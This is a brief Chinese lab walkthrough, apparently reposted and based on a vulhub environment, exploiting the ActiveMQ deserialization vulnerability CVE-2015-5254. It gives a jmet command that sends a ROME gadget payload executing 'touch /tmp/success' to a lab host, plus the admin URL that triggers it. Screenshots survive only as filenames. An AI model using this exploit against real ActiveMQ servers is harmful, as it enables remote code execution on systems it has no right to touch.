ActiveMQ 反序列化漏洞(CVE-2015-5254)

时间  2020-08-05 标签 activemq 序列 漏洞 cve

1431916-20190812112403883-1369452515.png

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.245.130 61616

1431916-20190812112442972-400239933.png

未建立

1431916-20190812112517786-2052283466.png

查看,点击消息列队,需登陆

http://192.168.245.130:8161/admin/browse.jsp?JMSDestination=event
1431916-20190812112636970-1272602324.pnghtml

成功

1431916-20190812112657857-62139163.png

模仿自:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.mdjava

转载于:https://www.cnblogs.com/mrhonest/p/11338697.htmlgit

联系我们 沪ICP备13005482号-10